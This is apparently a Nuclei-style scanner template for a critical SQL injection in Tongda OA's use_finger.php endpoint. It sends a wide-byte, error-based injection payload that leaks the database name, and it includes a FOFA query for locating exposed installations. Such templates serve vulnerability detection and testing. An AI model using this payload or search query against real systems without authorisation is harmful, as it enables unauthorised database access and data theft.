http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 'XPATH syntax error:'
            - use_finger.php
      method: GET
      path:
        - '{{BaseURL}}/inc/finger/use_finger.php?USER_ID=-123%df''and extractvalue(1, concat(0x5c,(database())))%23'
id: tongda-oa-use-finger-sqli
info:
    author: Co5mos
    description: |
        通达OA的 `/use_finger.php` 接口存在报错注入漏洞，攻击者可以利用该漏洞执行任意SQL语句，从而获取数据库中的敏感信息或控制数据库服务器。
    metadata:
        fofa-query: app="TDXK-通达OA"
    name: Tongda OA use_finger.php SQL Injection
    severity: critical
    tags:
        - tongda
        - 通达oa
        - TDXK-通达OA
